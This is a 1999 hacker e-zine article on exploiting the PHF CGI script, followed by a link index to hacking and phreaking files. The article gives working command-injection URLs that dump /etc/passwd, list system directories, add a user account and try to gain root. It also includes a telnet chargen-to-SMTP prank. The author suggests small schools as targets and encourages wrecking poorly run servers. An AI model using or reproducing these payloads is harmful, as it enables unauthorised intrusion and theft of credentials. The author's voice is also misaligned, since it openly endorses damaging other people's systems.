Click here to find books related to 'web security'.


¦       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!       ¦_
+----------------------------------------------------------------------------¦_
¦									     ¦	
¦         From Issue #33 - PHF Web Hacking                                   ¦ 
¦         by Dagashi                                                         ¦ 
¦____________________________________________________________________________¦_
¦____________________________________________________________________________¦_
+----------------------------------------------------------------------------¦_
¦                                                                            ¦_
¦      Alright there kiddies, it's time to lightly dive into the world of    ¦_
¦  how to obtain shells that do not rightfully belong to you and how to      ¦_
¦  generally piss off people on the Internet.  As always, this is a well     ¦_
¦  known bit on information (because no one in their right mind would give   ¦_
¦  you an exploit to a system that no one else knows of), so I take no       ¦_
¦  responsibility for whatever you do with it.                               ¦_
¦                                                                            ¦_
¦      Since the majority of computers on the Internet are of UNIX decent,   ¦_
¦  I will be mainly talk about their problems and such.  Now, the majority   ¦_
¦  of us know that UNIX is full of holes and other problems no matter what   ¦_
¦  revisions and patches are made, so this might not come as a big surprise  ¦
¦  when I tell you there is a common exploit that will run any program on    ¦
¦  your victim machine.  It is the PHF hack.  Though it is no big deal to    ¦
¦  the majority of ISP's, most little companies do not have the time or      ¦
¦  money to deal with all the problems of their operating systems.  Small    ¦
¦  schools that are NOT technologically oriented, like high schools with     ¦
¦  T1's and such would be a good example.  And so, this will work on some    ¦
¦  of them.                                                                  ¦
¦                                                                            ¦
¦      All that is required to be done is to put this into the URL of        ¦
¦  Netscape:                                                                 ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd    ¦
¦                                                                            ¦
¦      and you have a listing of the passwd file to use or abuse.  But the   ¦
¦  PHF exploit can do more then just that (for those of you who will be      ¦
¦  flaming me for writing such a simple article).  It can access any type    ¦
¦  of program that is on the opposing computer and run it.                   ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/               ¦
¦                                                                            ¦
¦      will give you the directory listing of everything from the root of    ¦
¦  the system.  From there, you can just alter it accordingly to have a      ¦
¦  peek around the system to see what else you can learn.                    ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin            ¦
¦                                                                            ¦
¦      would show you every command that is available in the bin dir.  If    ¦
¦  you slightly modified it, you would also be able to see the permissions   ¦
¦  of the specific files.                                                    ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin      ¦
¦                                                                            ¦
¦      which can come in handy since, well, seeing as how you have root      ¦
¦  permissions you now have a nice little bit of information about how the   ¦
¦  system functions can use that to get even more access or information out  ¦
¦  of it.                                                                    ¦
¦                                                                            ¦
¦      Or the best one of them all:                                          ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi    ¦
¦  %20dagashi%20100%20                                                       ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0    ¦
¦                                                                            ¦
¦      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500     ¦
¦                                                                            ¦
¦      Do that and you MIGHT have root access to the server by telnet.  Be   ¦
¦  forewarned that this is an old hack and many servers would not have the   ¦
¦  PHF script still running or have chmoded it to 000.  This can get you     ¦
¦  into a bunch of trouble, so be careful.  As I said before, this is well   ¦
¦  known and I wouldn't give it out to you unless most system                ¦
¦  administrators (if they deserve the title then they know this hack by     ¦
¦  heart) knew it as well.  But there are always those that don't deserve    ¦
¦  the honor of the name, and to those, you have my full consent to fuck up  ¦
¦  their machines to hell.                                                   ¦
¦                                                                            ¦
¦      For fun and excitement, type "telnet 127.0.0.1 19 | telnet 127.0.0.1  ¦
¦  25" in Linux and watch life become a ball.                                ¦
¦                                                                            ¦
+----------------------------------------------------------------------------+


This page was created Wed Aug 11 23:34:55 EDT 1999
Using Linux version 2.0.32 on an i586

Main Page @ Matarese.com The Myth of the 2600Hz Detector @ Matarese.com       Acquiring Account Information @ Matarese.com      

Act2! by Symantec @ Matarese.com       All hacks / Annoyance @ Matarese.com      

Alt 2600 Group FAQ @ Matarese.com       Hacking Angelfire @ Matarese.com      

Anonymous E-Mail @ Matarese.com       Anonymous FTP: Frequently Asked Questions (FAQ) @ Matarese.com      

Maintaining Access - Implementing Backdoors @ Matarese.com       How to Receive Banned Newsgroups FAQ @ Matarese.com      

Hacking BBS's @ Matarese.com       phreaking tutorial @ Matarese.com      

The Bluebox @ Matarese.com       List of Common Bugs @ Matarese.com      

Things that go Bump on the Internet @ Matarese.com       Hacking Calling Cards @ Matarese.com      

Expanding the capacity of Caller ID Boxes @ Matarese.com       What is Caller-ID? @ Matarese.com      

Hacking Call Back Verify @ Matarese.com       CULT OF THE DEAD COW @ Matarese.com      

Cellular Roaming: The New Deals @ Matarese.com       CELLULAR TELEPHONE PHREAKING PHILE SERIES @ Matarese.com      

Cracking Unix passwords @ Matarese.com       Hacking Webpages @ Matarese.com      

The Matarese Circle @ Matarese.com       Cisco Password Cracking Script @ Matarese.com      

Customer Name and Address @ Matarese.com       Cops and Robbers | UNIX Security @ Matarese.com      

Cracking NT Passwords @ Matarese.com       Odins cracking/coding and PPE resources @ Matarese.com      

Credit Carding Part I @ Matarese.com       How do I defeat Copy Protection? @ Matarese.com      

What are the DTMF frequencies? @ Matarese.com       Exploits FAQ @ Matarese.com      

Making Free Calls @ Matarese.com       FTP Bouncing @ Matarese.com      

Hackers Encyclopedia @ Matarese.com       The Conscience of a Hacker / Hacker Manifesto @ Matarese.com      

Hacking from Windows9x FTP @ Matarese.com       Hacking Tripod @ Matarese.com      

Hacking Web Pages @ Matarese.com       How to crack a UNIX password file. @ Matarese.com      

Hacking Servers : A Begginners Guide @ Matarese.com       TIPS FOR TRACKING HACKERS @ Matarese.com      

Hacking Tutorial @ Matarese.com       Hacking UNIX @ Matarese.com      

How to Hack the WWWboard Message Board 2.0 @ Matarese.com       Hackers Handbook @ Matarese.com      

Guide to Harmless-Hacking @ Matarese.com       All about security holes @ Matarese.com      

Hacking Hotmail @ Matarese.com       How to crack by +ORC complete tutorial in one file (BIG!) @ Matarese.com      

]How to Hack from from Harlequin and Archangel @ Matarese.com       Improve security by breaking into your site @ Matarese.com      

Ch1can0 BEOWULF @ Matarese.com       Internet Security @ Matarese.com      

Bugs and Backdoors in IRC clients, scripts and bots @ Matarese.com       IRC Hacking @ Matarese.com      

FAQ for Trading For FileZ in IRC @ Matarese.com       Creating a Xdcc offer bot for irc @ Matarese.com      

Integrated Systems Digital Network @ Matarese.com       Everything you should know about computer viruses @ Matarese.com      

Lan Technology Scorecard @ Matarese.com       Local Area Signalling Services (LASS) and Custom Calling Feature Control Codes @ Matarese.com      

Harmless Hacking - Linux @ Matarese.com       INDEX @ Matarese.com      

Loops wanted! @ Matarese.com       Mail Spoofing Explained @ Matarese.com      

Microsoft IIS Vulnerability @ Matarese.com       Microsoft(Yuk) Index Server exposes IDs and Passwords @ Matarese.com      

Intresting Microsoft Access 7.0 Trick @ Matarese.com       MS Money 2.0 Back Door @ Matarese.com      

Mind Your Own Business (MYOB) @ Matarese.com       Nameserver listing! @ Matarese.com      

Newbies handbook / HOW TO BEGIN IN THE WORLD OF H/P @ Matarese.com       Bugs in Windows NT (Too many to list here completely...) @ Matarese.com      

This Hack is for the OptiChat Original Chat Room @ Matarese.com       Internet Outdials @ Matarese.com      

Pager Frequencies @ Matarese.com       Password Recovery Techniques @ Matarese.com      

How to Steal Local Calls from Most Payphones @ Matarese.com       PBX's (Private Branch Exchanges) and WATS @ Matarese.com      

Cryptography / PGP @ Matarese.com            

Introduction to the Internet Protocols @ Matarese.com       Analysis of QueSO Performance @ Matarese.com      

Finger - ATTACKING FROM THE OUTSIDE @ Matarese.com       L0pht Security Advisory - Sendmail 8.7.5 @ Matarese.com      

Sniffer FAQ V 1.7 @ Matarese.com       SSPING/JOLT patches @ Matarese.com      

WORKING OUT-TELNETS @ Matarese.com       How do I post to a moderated newsgroup? @ Matarese.com      

What You Should Know About Computer Viruses @ Matarese.com       How can I protect myself from viruses and such? @ Matarese.com      

What is a trojan/worm/virus/logic bomb? @ Matarese.com       VMS Info (Password Cracking) @ Matarese.com      

HACKING THE WAL-MART ARMORGUARD COMPUTER PROTECTION SYSTEM @ Matarese.com       Using web proxies to disguise your IP address @ Matarese.com      

Dig up hidden CD Keys @ Matarese.com       X-Windows Security @ Matarese.com      

Copyright (C) 1999 - Matarese.com